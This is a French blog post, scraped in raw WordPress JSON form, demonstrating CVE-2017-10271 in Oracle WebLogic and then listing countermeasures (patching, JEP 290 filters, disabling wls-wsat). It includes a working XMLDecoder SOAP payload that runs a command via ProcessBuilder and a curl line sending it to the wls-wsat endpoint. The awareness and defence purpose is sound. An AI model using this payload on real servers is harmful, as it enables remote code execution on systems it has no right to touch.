Lors de mes diff\u00e9rentes interventions, j’essaie de sensibiliser les clients \u00e0 la n\u00e9cessit\u00e9 de prendre en compte la s\u00e9curit\u00e9 des serveurs J2EE. Je dis bien \u00ab\u00a0j’essaie\u00a0\u00bb car bon nombre d’entre eux ne me semblent pas totalement conscients des risques. Sous pr\u00e9texte d’\u00eatre cach\u00e9s derri\u00e8re une arm\u00e9e de pare-feux certains pensent \u00eatre \u00e0 l’abri d’attaques sur leurs serveurs d’applications.<\/p>\n
<\/p>\n
Au travers de cet article je souhaite montrer la simplicit\u00e9 avec laquelle il est possible d’ex\u00e9cuter du code sur un serveur distant via une simple requ\u00eate HTTP.<\/p>\n
<\/p>\n
La \u00ab\u00a0faille\u00a0\u00bb que j’utilise pour les besoins de la d\u00e9monstration est la CVE-2017-10271<\/a> La CVE-2017-10271<\/a> indique un vecteur d’attaque par le protocole interne de WebLogic \u00ab\u00a0T3\u00a0\u00bb mais c’est bien une simple requ\u00eate HTTP qui permet \u00e0 un attaquant de d\u00e9clencher l’ex\u00e9cution d’un code sur un serveur distant.<\/p>\n Le vecteur est donc une requ\u00eate HTTP. La cible de la requ\u00eate est une application web d\u00e9ploy\u00e9e en interne par WebLogic : wls-wsat<\/p>\n WSAT est l’acronyme de Web Services Atomic Transactions<\/a>. Ce composant permet une interop\u00e9rabilit\u00e9 de la stack web service de WebLogic avec d’autres syst\u00e8mes transactionnels comme .NET ou WebSphere par exemple. Il \u00e9tend les capacit\u00e9s de l’impl\u00e9mentation JAX-WS de WebLogic Server.<\/p>\n Les chapitres montrent comment effectuer l’attaque sur un serveur WebLogic en fonctionnement.<\/p>\n Pour une \u00e9ni\u00e8me fois la faille porte sur la d\u00e9s\u00e9rialisation des objets Java. V\u00e9ritable cauchemar depuis son apparition dans Java, sa capacit\u00e9 de s\u00e9rialisation\/d\u00e9serialisation des objets ne fait que poser des probl\u00e8mes en terme de s\u00e9curit\u00e9. Le probl\u00e8me vient de la d\u00e9s\u00e9rialisation des objets qui ne contr\u00f4le pas ce quelle cr\u00e9\u00e9e comme types d’objets au sein de la JVM. Ajout\u00e9 \u00e0 cela les capacit\u00e9s d’introspection de la JVM et vous avez une parfaite bo\u00eete \u00e0 outils pour hacker.<\/p>\n Serveur d’application : WebLogic Server 10.3.6.0.0<\/p>\n Un domaine WebLogic avec 1 ou plusieurs serveurs en mode PRODUCTION.<\/p>\n Syst\u00e8me d’exploitation : A votre convenance<\/p>\n Outils :<\/p>\n L’attaque est r\u00e9alis\u00e9e en soumettant un payload \u00e0 un des web services expos\u00e9s par l’application web wls-wsat :<\/p>\n Enregistrer le payload suivant dans un fichier texte sur le disque dur :<\/p>\n [pastacode lang=\u00a0\u00bbmarkup\u00a0\u00bb manual=\u00a0\u00bb%3Csoapenv%3AEnvelope%20xmlns%3Asoapenv%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fsoap%2Fenvelope%2F%22%3E%20%0A%09%3Csoapenv%3AHeader%3E%0A%09%09%3Cwork%3AWorkContext%20xmlns%3Awork%3D%22http%3A%2F%2Fbea.com%2F2004%2F06%2Fsoap%2Fworkarea%2F%22%3E%20%0A%09%09%09%3Cjava%20version%3D%221.6_0.29%22%20class%3D%22java.beans.XMLDecoder%22%3E%20%0A%09%09%09%3Cvoid%20class%3D%22java.lang.ProcessBuilder%22%3E%20%0A%09%09%09%09%3Carray%20class%3D%22java.lang.String%22%20length%3D%223%22%3E%0A%09%09%09%09%3Cvoid%20index%20%3D%20%220%22%3E%0A%09%09%09%09%09%3Cstring%3Ecmd%3C%2Fstring%3E%0A%09%09%09%09%3C%2Fvoid%3E%0A%09%09%09%09%3Cvoid%20index%20%3D%20%221%22%3E%20%0A%09%09%09%09%09%3Cstring%3E%2Fc%3C%2Fstring%3E%20%0A%09%09%09%09%3C%2Fvoid%3E%0A%09%09%09%09%3Cvoid%20index%20%3D%20%222%22%3E%0A%09%09%09%09%09%3Cstring%3Eecho%20hello%20%3E%20cve.txt%3C%2Fstring%3E%0A%09%09%09%09%3C%2Fvoid%3E%0A%09%09%09%3C%2Farray%3E%0A%09%09%09%3Cvoid%20method%3D%22start%22%2F%3E%0A%09%09%09%3C%2Fvoid%3E%0A%09%09%09%3C%2Fjava%3E%0A%09%09%09%3C%2Fwork%3AWorkContext%3E%20%0A%09%3C%2Fsoapenv%3AHeader%3E%20%0A%3Csoapenv%3ABody%2F%3E%0A%3C%2Fsoapenv%3AEnvelope%3E\u00a0\u00bb message=\u00a0\u00bbPayload XML\u00a0\u00bb highlight=\u00a0\u00bb\u00a0\u00bb provider=\u00a0\u00bbmanual\u00a0\u00bb\/]<\/p>\n La commande distante \u00e0 ex\u00e9cuter est \u00e0 inscrire directement dans le payload en utilisant les 3 param\u00e8tres de la m\u00e9thode \u00ab\u00a0start\u00a0\u00bb. L’exemple a \u00e9t\u00e9 ex\u00e9cut\u00e9 sous Windows et d\u00e9clenche la commande \u00ab\u00a0cmd \/c echo hello > cve.txt\u00a0\u00bb Elle \u00e9crira donc le texte \u00ab\u00a0hello\u00a0\u00bb dans le fichier cve.txt \u00e0 la racine du domaine<\/strong>.<\/p>\n Je laisse libre cours \u00e0 votre imagination pour trouver d’autres commandes \u00e0 ex\u00e9cuter \u00e0 distance.<\/p>\n Une fois le fichier avec le payload pr\u00eat, il suffit de l’envoyer vers le serveur. L’utilitaire curl suffit pour \u00e7a :<\/p>\n [pastacode lang=\u00a0\u00bbbash\u00a0\u00bb manual=\u00a0\u00bbcurl%20–header%20%22Content-Type%3A%20text%2Fxml%3Bcharset%3DUTF-8%22%20%20–data%20%40payload.xml%20http%3A%2F%2Flocalhost%3A7001%2Fwls-wsat%2FCoordinatorPortType\u00a0\u00bb message=\u00a0\u00bbLa commande curl qui permet d’envoyer le payload vers le serveur\u00a0\u00bb highlight=\u00a0\u00bb\u00a0\u00bb provider=\u00a0\u00bbmanual\u00a0\u00bb\/]<\/p>\n Le r\u00e9sultat de la commande ressemblera \u00e0 ceci :<\/p>\n [pastacode lang=\u00a0\u00bbmarkup\u00a0\u00bb manual=\u00a0\u00bb%3C%3Fxml%20version%3D’1.0’%20encoding%3D’UTF-8’%3F%3E%3CS%3AEnvelope%20xmlns%3AS%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fsoap%2Fenvelope%2F%22%3E%3CS%3ABody%3E%3CS%3AFault%20xmlns%3Ans4%3D%22http%3A%2F%2Fwww.w3.org%2F2003%2F05%2Fsoap-envelope%22%3E%3Cfaultcode%3ES%3AServer%3C%2Ffaultcode%3E%3Cfaultstring%3E0%3C%2Ffaultstring%3E%3C%2FS%3AFault%3E%3C%2FS%3ABody%3E%3C%2FS%3AEnvelope%3E%0A\u00a0\u00bb message=\u00a0\u00bb\u00a0\u00bb highlight=\u00a0\u00bb\u00a0\u00bb provider=\u00a0\u00bbmanual\u00a0\u00bb\/]<\/p>\n Cette r\u00e9ponse indique qu’une erreur s’est produite au niveau du service distant. Peu importe, le mal est fait. Inspectez le r\u00e9pertoire racine du domaine, vous y trouverez votre fichier.<\/p>\n Que faut-il faire face \u00e0 ce genre de menace ?<\/p>\n Oracle a publi\u00e9 un correctif dans son CPU d’octobre 2017<\/a>. A installer d’urgence si ce n’est pas d\u00e9j\u00e0 fait.<\/p>\n Dans le cas pr\u00e9cis des probl\u00e8mes li\u00e9s \u00e0 la d\u00e9serialisation des objets, JAVA a \u00e9t\u00e9 \u00e9quip\u00e9 d’un m\u00e9canisme de \u00ab\u00a0filtrage\u00a0\u00bb des objets qui sont d\u00e9s\u00e9rialis\u00e9s. Cette nouvelle capacit\u00e9 est d\u00e9crite dans la JEP 290<\/a>. L’id\u00e9e est de disposer :<\/p>\n Ces 2 listes peuvent \u00eatre enrichies \u00e0 volont\u00e9 au lancement du serveur.<\/p>\n WebLogic peut utiliser cette capacit\u00e9 sous r\u00e9serve d’utiliser au minimum<\/strong> une des versions de java suivantes :<\/p>\n Ne pas h\u00e9siter \u00e0 consulter la documentation Oracle<\/a> sur le sujet pour les d\u00e9tails de la mise en oeuvre.<\/p>\n <\/p>\n Pour rappel JDK 6 n’est plus support\u00e9 par Oracle depuis d\u00e9cembre 2018.<\/p>\n Pour le cas pr\u00e9cis d’une attaque via l’application web wls-wsat il est possible de la d\u00e9sactiver si elle n’est pas n\u00e9cessaire.<\/p>\n Pour cela il suffit d’ajouter la propri\u00e9t\u00e9 suivante au d\u00e9marrage des instances WebLogic du domaine (serveur d’administration inclus)<\/p>\n [pastacode lang=\u00a0\u00bbbash\u00a0\u00bb manual=\u00a0\u00bb-Dweblogic.wsee.wstx.wsat.deployed%3Dfalse\u00a0\u00bb message=\u00a0\u00bb\u00a0\u00bb highlight=\u00a0\u00bb\u00a0\u00bb provider=\u00a0\u00bbmanual\u00a0\u00bb\/]<\/p>\n <\/p>\n A noter \u00e9galement que cette application est d\u00e9sactiv\u00e9e par d\u00e9faut<\/strong> pour les versions 12.2.1.3.x et sup\u00e9rieures de WebLogic.<\/p>\n <\/p>\n Ces contre-mesures doivent venir compl\u00e9ter les r\u00e8gles de durcissement des environnements d\u00e9j\u00e0 en vigueur.<\/p>\n L’exploitation de la faille est donc tr\u00e8s simple. La seule solution pour la contrer est de patcher l’installation WebLogic avec les correctifs de s\u00e9curit\u00e9 publi\u00e9s par Oracle<\/a>. Ils sont publi\u00e9s tous les trimestres. A l’heure o\u00f9 cet article est publi\u00e9, le dernier en date est celui de janvier 2019<\/a>. Vous savez ce qu’il vous reste \u00e0 faire.<\/p>\n La s\u00e9curit\u00e9 ne concerne \u00e9videment pas uniquement le serveur d’application. Le syst\u00e8me d’exploitation et Java sont concern\u00e9s \u00e9galement en tout premier lieu. Leur mise \u00e0 jour r\u00e9guli\u00e8re avec les derniers correctifs est primordiale pour limiter le risque d’une action malveillante sur les serveurs.<\/p>\n Les failles li\u00e9es \u00e0 la d\u00e9s\u00e9rialisation des objets Java sont nombreuses et pas toujours \u00e9videntes \u00e0 contrer. L’utilisation du filtrage des classes apport\u00e9 par la JEP 290<\/a> peut constituer une r\u00e9ponse. Toutefois, il n’est pas \u00e9vident de d\u00e9terminer les classes qui font usage de la d\u00e9s\u00e9rialisation. Un outil comme la \u00ab\u00a0Vigie<\/a>\u00a0\u00bb peut apporter des r\u00e9ponses en pistant toutes les tentatives de d\u00e9s\u00e9rialisations effectu\u00e9es par une application Java.<\/p>\n <\/p>\n","protected":false},"excerpt":{"rendered":" Lors de mes diff\u00e9rentes interventions, j’essaie de sensibiliser les clients \u00e0 la n\u00e9cessit\u00e9 de prendre en compte la s\u00e9curit\u00e9 des serveurs J2EE. Je dis bien \u00ab\u00a0j’essaie\u00a0\u00bb car bon nombre d’entre eux ne me semblent pas totalement conscients des risques. Sous pr\u00e9texte d’\u00eatre cach\u00e9s derri\u00e8re une arm\u00e9e de pare-feux certains pensent \u00eatre \u00e0 l’abri d’attaques sur […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[7,59,4],"tags":[58,60,62,57,38,56,61],"class_list":["post-349","post","type-post","status-publish","format-standard","hentry","category-java","category-securite","category-weblogic","tag-cve","tag-cve-2017-10271","tag-deserialisation","tag-j2ee","tag-java","tag-securite","tag-serialisation"],"_links":{"self":[{"href":"https:\/\/corsaire-consulting.fr\/blog\/index.php\/wp-json\/wp\/v2\/posts\/349","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/corsaire-consulting.fr\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/corsaire-consulting.fr\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/corsaire-consulting.fr\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/corsaire-consulting.fr\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=349"}],"version-history":[{"count":28,"href":"https:\/\/corsaire-consulting.fr\/blog\/index.php\/wp-json\/wp\/v2\/posts\/349\/revisions"}],"predecessor-version":[{"id":427,"href":"https:\/\/corsaire-consulting.fr\/blog\/index.php\/wp-json\/wp\/v2\/posts\/349\/revisions\/427"}],"wp:attachment":[{"href":"https:\/\/corsaire-consulting.fr\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=349"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/corsaire-consulting.fr\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=349"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/corsaire-consulting.fr\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=349"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
Publi\u00e9e en octobre 2017, cette faille concerne Oracle WebLogic Server pour les versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 et 12.2.1.2.0
Les versions ant\u00e9rieurs \u00e0 la 10.3.6 sont sans doutes concern\u00e9es mais Oracle ne fournit aucune informations sur ces versions pour lesquelles il n’existe plus de support.<\/p>\nD\u00e9monstration<\/h1>\n
La faille exploit\u00e9e<\/h2>\n
L’environnement<\/h2>\n
\n
Pr\u00e9paration<\/h2>\n
\n
D\u00e9clenchement<\/h2>\n
Contre-mesures<\/h1>\n
Patcher vos serveurs<\/h2>\n
Patcher Java<\/h2>\n
\n
\n
D\u00e9sactiver les fonctions inutiles<\/h2>\n
Conclusion<\/h1>\n